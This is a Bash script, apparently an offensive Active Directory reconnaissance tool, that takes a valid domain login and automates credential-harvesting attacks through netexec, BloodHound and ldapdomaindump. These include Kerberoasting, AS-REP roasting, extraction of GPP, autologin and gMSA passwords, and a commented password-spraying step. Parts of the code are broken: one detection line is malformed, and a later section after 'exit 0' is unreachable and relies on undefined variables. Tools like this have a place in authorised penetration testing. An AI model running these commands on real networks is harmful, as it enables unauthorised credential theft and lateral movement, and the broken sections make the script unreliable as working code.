#!/bin/bash

VERBOSE=0
DATE=$(date +"%Y%m%d-%H-%M")
#TODO add option to override the OUTPUTDIR
OUTPUTDIR="./autoADRecon_${DATE}"
LOGFILE="$OUTPUTDIR/autoADRecon_${DATE}.log"
# Default netexec threads
NETEXECTHREADS=100

printred(){
        echo -e "\033[0;31m$1\033[0m"
}
printgreen(){
        echo -e "\033[0;32m$1\033[0m"
}


# Impacket folder for kali linux:
IMPACKETSCRIPTS="/usr/share/doc/python3-impacket/examples"
NETEXEC="netexec"
SMBMAP="smbmap"
BLOODHOUND="$HOME/.local/bin/bloodhound-ce-python"
LDAPDOMAINDUMP="ldapdomaindump"
HOST="host"

MODE=audit

# Retired tools:
#DROPTHEMICSCANNER="/opt/outils/exploit/cve-2019-1040-scanner/scan.py"
#SMBCRUNCHDIR="/opt/outils/windows/SMBCrunch/"
#GODDI="/opt/outils/windows/goddi/goddi-linux-amd64"
#LDAPSCANNER="/opt/outils/windows/ldap-scanner/ldap-scanner.py" #retired

checkbinary(){
        BINARY="$1"
        MANDATORY="$2"
        FOUND=false
        #echo "Checking for $BINARY"
        if [ -x "$BINARY" ]; then
                #echo "binary found at specified path"
                FOUND=true
        fi
        if [ -x "$(which $BINARY)" ]; then
                #echo "$BINARY found in the path"
                FOUND=true
        fi
        if [ "$FOUND" == true ]; then
                printgreen "Found: $BINARY"
        fi
        if [ "$MANDATORY" != true ] && [ "$FOUND" == false ]; then
                printred "Not found requirement: $BINARY"
        fi
        if [ "$MANDATORY" == true ] && [ "$FOUND" == false ]; then
                printred "Not found mandatory requirement: $BINARY"
                exit 1
        fi
}

checkreqs(){
	checkbinary "$HOST" true
	checkbinary "$IMPACKETSCRIPTS/GetADUsers.py"
	checkbinary "$NETEXEC" true
	checkbinary "$BLOODHOUND" true
	checkbinary "$SMBMAP" true
	checkbinary "$LDAPDOMAINDUMP" true
}

printusage(){
	echo "USAGE:
	$0 USERNAME PASSWORD FULLDOMAIN_NAME SMBHOSTSFILE [DCIP]

	Do all possible recon on a windows AD with user valid creds
"
}

printfullusage(){
	echo "
$0 (audit|scan)
	audit         		Prints out commands that will be performed during the scan without executing them
	scan            	Perform an AD scan with valid user credentials and save the output

	-u <[domain\]user>  Username (and optionally domain) to use to authentication with the AD. Format: [domain\]username
	-p <password>   	Password of the user to authenticate with
	-d <target-domain>  (optional) Domain to extract info from
	-c <dcip>   		(optional) IP address of a Domain Controller
	-i <hostfile>		(optional) Valid path to a file containing a list of SMB hosts. If provided, will be combined with the domain computer list.
	-o <output-dir>  	Use the specified output directory instead of the automatically computed one
	-x               	Activate socks proxy mode and use proxychains. Configuration will be red from the sytem configuration
	-v              	Verbose mode
	-h              	Print this help
"
}

printOrExecute(){
	CMD="$1"
	MODE="$2"
	if [ "$MODE" == "audit" ]; then
		echo "[AUDIT] $CMD"
	else
		if [ "$VERBOSE" == 1 ]; then
			echo "[EXECUTING] $CMD"
		fi
		eval "$CMD"
	fi
}

logger(){
	MESSAGE="$1"
	COLOR="$2"
	if [ "$COLOR" == "red" ]; then
		MESSAGE="\033[0;31m$MESSAGE\033[0m"
	elif [ "$COLOR" == "green" ]; then
		MESSAGE="\033[0;32m$MESSAGE\033[0m"
	fi
	if [ "$MODE" == "audit" ]; then
		echo -e "$MESSAGE"
	else
		echo -e "$MESSAGE" | tee -a "$LOGFILE"
	fi
}

isAccountValid(){
	DCIP="$1"
	USERNAME="$2"
	PASSWORD="$3"
	DOMAIN="$4"
	#printOrExecute "$SMBMAP -H '$DCIP' -u '$USERNAME' -p '$PASSWORD' -d '$DOMAIN' | grep 'Status: Authenticated'" "$MODE"
	# Let's do it now with netexec
	printOrExecute "$NETEXEC smb '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' --threads 1 | grep '[+]'" "$MODE"
	return $?
}

isValidArgument(){
	#Verify if argument is empty or begins with a '-' char
	argument="$1"
	if [ "$argument" == "" -o "${argument:0:1}" == "-" ]; then
		echo "Invalid argument value $1"
		return 1
	fi
	return 0
}

# Start of main:
checkreqs

# Identify mode
if [ "$1" == "audit" ]; then
	MODE="audit"
	echo "Audit mode selected, no command will be executed"
elif [ "$1" == "scan" ]; then
	MODE="scan"
	echo "Scan mode selected, commands will be executed"
else
	echo "First argument must be either 'audit' or 'scan'"
	printfullusage
	exit 1
fi

# Argument parsing
OPTIND=2         # Position ourselves after the first mandatory argument (mode)
# Initialize our own variables:
USERNAME=""
PASSWORD=""
DOMAIN=""
TARGETDOMAIN=""
HOSTFILE=""
DCIP=""
SOCKS=0
while getopts ":h?vxo:u:p:d:i:c:" opt; do
	case "$opt" in
		h)  printfullusage
			exit 1
			;;
		v)  VERBOSE=1
			echo "Verbose mode activated"
			;;
		x)  SOCKS=1
			echo "Socks proxy mode activated
			Using proxychains for all network commands"
			;;
		u)  USERNAME="${OPTARG}"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -u requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		p)  PASSWORD="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -p requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		d)  TARGETDOMAIN="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -d requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		i)  HOSTFILE="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -i requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		o)  OUTPUTDIR="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -o requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			LOGFILE="$OUTPUTDIR/autoADRecon_${DATE}.log"
			;;
		c)  DCIP="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -c requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		:)  echo "Option -${OPTARG} requires an argument."
			exit 1
			;;
		?)  echo "Unrecognised Option: -${OPTARG}"
			exit 1
			;;
	esac
done

echo "\$USERNAME=$USERNAME"
echo "\$PASSWORD=$PASSWORD"
echo "\$DOMAIN=$DOMAIN"
echo "\$TARGETDOMAIN=$TARGETDOMAIN"
echo "\$HOSTFILE=$HOSTFILE"
echo "\$DCIP=$DCIP"
echo "\$SOCKS=$SOCKS"
echo ""

shift $((OPTIND-1))
[ "${1:-}" = "--" ] && shift

if [ "$USERNAME" = "" -o "$PASSWORD" == "" ]; then
	echo "Missing at least one mandatory argument:"
	echo "		Username, Password"
	echo ""
	printfullusage
	exit 1
fi
if [ "$TARGETDOMAIN" == "" -a "$DCIP" == "" ]; then
	echo "Neither target-domain nor DCIP provided:"
	echo "		Please provide at least one of them."
	echo ""
	printfullusage
	exit 1
fi
# Argument parsing done

# Parse the username to extract domain if provided in format domain\username
if [[ "$USERNAME" == *"\\"* ]]; then
	DOMAIN="${USERNAME%%\\*}"
	USERNAME="${USERNAME##*\\}"
	printgreen "Extracted domain $DOMAIN from username, continue?"
fi

# Determine missing parameters
if [ "$DCIP" == "" ]; then
	echo "DC IP not provided, attempting to find it automatically"
	#if not provided determine automatically the DC IP
	DCIP=$(host "$TARGETDOMAIN" | grep "has address" | cut -d ' ' -f 4 | head -1)
	if [ "$DCIP" == "" ]; then
		printred "Can't find the DC automatically, please provide it"
		exit 1
	fi
	printgreen "Found $DCIP as DCIP, continue?"
fi
if [ "$TARGETDOMAIN" == "" ]; then
	echo "Domain not provided attempting to find it automatically"
	#if not provided determine automatically the Domain by connecting to the DC provided
	TARGETDOMAIN="$($NETEXEC smb $DCIP)" | grep domain: | cut -d '(' -f 3 | cut -d : -f 2 | sed 's/)//'
	if [ "$TARGETDOMAIN" == "" ]; then
		printred "Can't find the Domain automatically, please provide it"
		exit 1
	fi
	printgreen "Found $TARGETDOMAIN as target-domain, continue?"
fi

if [ "$DOMAIN" == "" ]; then
	DOMAIN="$TARGETDOMAIN"
	printgreen "Using $DOMAIN as domain for authentication"
fi

# Create output directory
if [ "$MODE" != "audit" ]; then
	if [ -d "$OUTPUTDIR" ]; then
		echo "Output directory $OUTPUTDIR already exists, to you want to continue anyway ? [N/y]"
		echo "Files will be overwritten"
		read answer
		if [ "$answer" != "y" ] && [ "$answer" != "Y" ]; then
			echo "Exiting as requested"
			exit 1
		fi
	else
		logger "[*] Creating output directory $OUTPUTDIR"
		mkdir "$OUTPUTDIR" || exit
	fi
	
fi

#TODO: -vv could reactivate the proxychains debug
if [ "$SOCKS" == 1 ]; then
	NETEXEC="proxychains -q $NETEXEC"
	SMBMAP="proxychains -q $SMBMAP"
	IMPACKETSCRIPTS="proxychains -q $IMPACKETSCRIPTS"
	LDAPDOMAINDUMP="proxychains -q $LDAPDOMAINDUMP"
	BLOODHOUND="proxychains -q $BLOODHOUND"
	HOST="proxychains -q $HOST -T"
	# Reduce threads in socks mode
	# Too many threads will lead to timeouts and errors.
	# Reduce if working through HTTP tunnel (sliver c2, etc.)
	NETEXECTHREADS=10
	# TODO: measure the response time to adjust the timeout value accordingly
fi

# Test that the account is valid
logger "
[*] Checking if provided credentials are valid on $DCIP for domain $TARGETDOMAIN with user $USERNAME:"
if [ "$MODE" == "audit" ]; then
	echo "	Not verifying credentials in audit mode"
else
	if ! isAccountValid "$DCIP" "$USERNAME" "$PASSWORD" "$DOMAIN"; then
		echo "	Can't connect with supplied credentials ($USERNAME) to $DCIP ($TARGETDOMAIN)"
	exit 1
	fi
fi

# List domain Controllers again
logger "
[*] Identifying domain controllers in the domain $TARGETDOMAIN :"
printOrExecute "$NETEXEC ldap $DCIP -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --dc-list --dns-tcp --dns-server $DCIP | tee -a '$OUTPUTDIR/nxc_dc-list.out' | tee -a '$LOGFILE'" "$MODE"
#printOrExecute "$HOST '$TARGETDOMAIN' | grep 'has address' | cut -d ' ' -f 4 | tee '$OUTPUTDIR/domainControllers.list'" "$MODE"

# Bloodhound Extract
logger "
[*] Fetching Bloodhound data from the AD:"
printOrExecute "mkdir '$OUTPUTDIR/bloodhound' || exit" "$MODE"
printOrExecute "cd '$OUTPUTDIR/bloodhound' || exit" "$MODE"
printOrExecute "$BLOODHOUND -u '$USERNAME@$DOMAIN' -p '$PASSWORD' -d '$TARGETDOMAIN' -c All,LoggedOn --zip --dns-tcp -ns $DCIP | tee -a '../../$LOGFILE'" "$MODE"
#Alternative with netexec:
#printOrExecute "$NETEXEC ldap $DCIP -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --bloodhound -c All,LoggedOn --dns-tcp --dns-server $DCIP --threads $NETEXECTHREADS --zip | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/bloodhound-extract.out'" "$MODE"
printOrExecute "cd ../../ || exit" "$MODE"

# AD Recon with ldapdomaindump
logger "
[*] Fetching AD infos:"
# Retired
#"$GODDI" -username "$USERNAME" -password "$PASSWORD" -domain "$DOMAIN" -dc "$DOMAIN" -unsafe 2>&1 | tee -a "$LOGFILE"
printOrExecute "$LDAPDOMAINDUMP --user '$DOMAIN\\$USERNAME' --password '$PASSWORD' '$DCIP' -o '$OUTPUTDIR/ldapdomaindump' | tee -a '$LOGFILE'" "$MODE"
# Check success of the extract
# Extract computer list
logger "[*] Extracting domain computer list from ldapdomaindump"
ADCOMPUTERFQDNS="$OUTPUTDIR/ldapdomaindump/domain_computers.fqdn"
# Grep FQDNs only
cut -f 3 "$OUTPUTDIR/ldapdomaindump/domain_computers.grep" | sort -u > "$ADCOMPUTERFQDNS"
logger "[*] got $(wc -l < "$ADCOMPUTERFQDNS") computers in the domain list"

# Kerberoasting
# extract UserSPN TGS tickets
logger "
[*] Now kerberoasting ...
[*] Fetching User SPN TGSs:"
# Retired GetUserSPNs.py
#printOrExecute "$IMPACKETSCRIPTS/GetUserSPNs.py  -request '$DOMAIN/$USERNAME:$PASSWORD' -dc-ip '$DCIP' -target-domain '$TARGETDOMAIN' | tee -a '$LOGFILE' | tee '$OUTPUTDIR/userSPNs.out'" "$MODE"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --kerberoasting '$OUTPUTDIR/nxc_kerberoasting.out' --threads $NETEXECTHREADS | tee -a '$LOGFILE'" "$MODE"
#extract TGTs without kerberos pre-auth

logger "
[*] Fetching TGTs of users without pre-auth:"
# Retired GetNPUsers.py
#printOrExecute "$IMPACKETSCRIPTS/GetNPUsers.py '$DOMAIN/$USERNAME:$PASSWORD' -request -dc-ip '$DCIP' -target-domain '$TARGETDOMAIN' | tee -a '$LOGFILE' | tee '$OUTPUTDIR/preAuthUsers.out'" "$MODE"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --asreproast '$OUTPUTDIR/nxc_asreproast.out' --threads $NETEXECTHREADS | tee -a '$LOGFILE'" "$MODE"


# List ADCS servers
logger "
[*] Fetching ADCS servers:"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M adcs --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_adcs.out'" "$MODE"
# List SCCM config
logger "
[*] Fetching SCCM configs:"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M sccm --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_sccm.out'" "$MODE"

# More enum:
# obsolete

# --active-users (contains user descriptions)
# nxc ldap $DCIP -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --active-users | tee nxc_active-users.out
# cut -d ' ' -f 35 ./nxc_active-users.out | grep -v '[+]' | grep -v [*] | grep -v '-Username-' | sort -u > nxc_active-users.out.list
# tr '[:upper:]' '[:lower:]' < nxc_active-users.out.list | sort -u > nxc_active-users.out.list2
# suggest spray user as pass with this list
# proxychains nxc smb 192.168.1.101 -u nxc_active-users.out.list2 -p nxc_active-users.out.list2 --no-bruteforce --continue-on-success

# --pass-pol (password policy)
# -M entra-id
# Test if Active Directory Domain Services allows to create AD DNS records for low priv users

#Get MachineAccountQuota attribute
logger "
[*] Getting MachineAccountQuota attribute..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M maq --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_maq.out'" "$MODE"

# Extract subnets
logger "
[*] Extracting subnets ..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M get-network --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_subnets.out'" "$MODE"
# Extract obsolete hosts
logger "
[*] Extracting obsolete hosts ..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M obsolete --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_obsolete.out'" "$MODE"


# Integrate other ideas from
#https://github.com/ahmadallobani/BaldHead/blob/main/commands/enum.py
logger "
[*] Enumerating delegation relationships..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --find-delegation --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_find-delegation.out'" "$MODE"
logger "
[*] Enumerating Users trusted for delegation..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --trusted-for-delegation --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_trusted-for-delegation.out'" "$MODE"
logger "
[*] Enumerating users with PASSWD_NOTREQD..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --password-not-required --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_password-not-required.out'" "$MODE"
logger "
[*] Identifying pre2k computers..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M pre2k --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_pre2k.out'" "$MODE"
logger "
[*] Enumerating GMSA accounts..."
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --gmsa --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_gmsa.out'" "$MODE"

#Search for quick wins
#First, dig for gpp passwords
logger "
[*] Looking for passwords in GPPs"
printOrExecute "$NETEXEC smb '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M gpp_password --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_gppScan.out'" "$MODE"
logger "
[*] Looking for passwords in autologin"
printOrExecute "$NETEXEC smb '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M gpp_autologin --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_gppScan.out'" "$MODE"
logger "
[*] Looking for passwords in descriptions"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M get-desc-users --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_get-desc-users.out'" "$MODE"
logger "
[*] Looking for vulns in ADCS configs"
printOrExecute "$NETEXEC ldap '$DCIP' -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M certipy-find --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/nxc_certipy-find.out'" "$MODE"
# Add full certipy scan
# proxychains certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip $DCIP -json -text -enabled -output $OUTPUTDIR/certipy -dns-tcp -ns $DCIP

logger "
[*] Script executed successfully."

logger "
Now we suggest the following next steps (without socks proxy):
autoNetRecon $ADCOMPUTERFQDNS
then
autoADrecon -u '$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -i autoNetRecon-output-dir/hostsSMB.list"


logger "
Also check for AD DNS write permissions with
(not sure of this):
krbrelayx/dnstool.py '$DOMAIN/$USERNAME:$PASSWORD@$DCIP' --dns-server $DCIP --check-write"

exit 0


# Scanning all hosts once
ADCOMPUTERIPS="$OUTPUTDIR/ldapdomaindump/domain_computers.ips"
logger "
[*] Scanning all discovered hosts to identify resolvable and reachable SMB hosts"
# Resolve hosts
logger "[*] Resolving hostnames to IPs"
cat "$ADCOMPUTERFQDNS" | xargs -P 20 -I{} sh -c "$HOST -T {} $DCIP 2>/dev/null | grep 'has address'" | tee '$OUTPUTDIR/_resolved_hosts.list'
cut -d ' ' -f 4 "$OUTPUTDIR/_resolved_hosts.list" > "$ADCOMPUTERIPS"
rm "$OUTPUTDIR/_resolved_hosts.list"
logger "[*] got $(wc -l < "$ADCOMPUTERIPS") resolved computers in the domain list"
# SMB ping
logger "
[*] Now SMB scanning all resolvable domain computers"
# Either use IPs or hostnames. IF using hostnames:
# netexec smb _resolved_hosts.list --dns-tcp -t 10 --dns-server 10.8.27.102
# But IPs will be faster
printOrExecute "$NETEXEC smb '$ADCOMPUTERIPS' --threads $NETEXECTHREADS | tee '$OUTPUTDIR/netexec-sweep.out' | tee -a '$LOGFILE'" "$MODE"

# Combine with provided hostfile if any
if [ "$HOSTFILE" == "" ]; then
	printgreen "No hostfile provided, using only domain computer list"
	cp "$OUTPUTDIR/ldapdomaindump/domain_computers.grep.list" "$COMBINEDHOSTFILE"
else
	cat "$HOSTFILE" "$OUTPUTDIR/ldapdomaindump/domain_computers.grep.list" | sort -u > "$COMBINEDHOSTFILE"
fi
cut -d ' '-f 1 $REACHABLEHOSTS > $REACHABLEHOSTS

# Scan DCs for vulns and misconfigurations
# Check LDAP on domain controllers
logger "
[*] Looking for LDAP signing on domain controllers"
#python3 "$LDAPSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$OUTPUTDIR/domainControllers.list" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/ldapSigningDCs.out"
printOrExecute "$NETEXEC ldap '$OUTPUTDIR/domainControllers.list' -M ldap-checker -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee '$OUTPUTDIR/ldapSigningDCs.out'" "$MODE"


# Scan other hosts for vulns and misconfigurations

#list all accessible shares
logger "
[*] Listing all accessible shares"
# Retire smbmap
#printOrExecute "$SMBMAP --host-file $REACHABLEHOSTS -u '$USERNAME' -p '$PASSWORD' -d '$DOMAIN' | tee -a '$LOGFILE'  | tee '$OUTPUTDIR/smbmapAll.out'" "$MODE"
printOrExecute "$NETEXEC smb $REACHABLEHOSTS -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' --shares --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/shares.out'" "$MODE"

#TODO: HOSTFILE is too large and inefficient in large networks. smbhosts file would be better here
#"$SMBCRUNCHDIR/SMBHunt.pl" -i "$HOSTFILE" -o "$OUTPUTDIR/smbhunt.out" -a "$DOMAIN\\$USERNAME:$PASSWORD" | tee -a "$LOGFILE"
#list all files in thoses shares
#"$SMBCRUNCHDIR/SMBList.pl" -c "$DOMAIN\\$USERNAME:$PASSWORD" -s "$OUTPUTDIR/smbhunt.out" -o "$OUTPUTDIR/smblist.out" | tee -a "$LOGFILE"
#search for interesting file names in the output
#grep -i passw "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i pwd "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i cred "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i .kdbx "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i "shadow " "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i ntdis.dit "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"

# Hosts with webdav
logger "
[*] Checking for active WebClient service:"
printOrExecute "$NETEXEC smb $REACHABLEHOSTS -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M webdav --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/webdav.out'" "$MODE"

# Hosts with webdav
logger "
[*] Checking for active spooler service:"
printOrExecute "$NETEXEC smb $REACHABLEHOSTS -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M spooler --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/spooler.out'" "$MODE"

#Find unpatched systems:
logger "
[*] Looking for unpatched systems ...
Remove-Mic"
printOrExecute "$NETEXEC smb $REACHABLEHOSTS -u '$DOMAIN\\$USERNAME' -p '$PASSWORD' -d '$TARGETDOMAIN' -M remove-mic --threads $NETEXECTHREADS | tee -a '$LOGFILE' | tee -a '$OUTPUTDIR/remove-mic.out'" "$MODE"

# Check for other vulnerabilities
#zerologon
#timeroast
#printnightmare
#smbghost
#nopac
#ntlm_reflection

exit 0
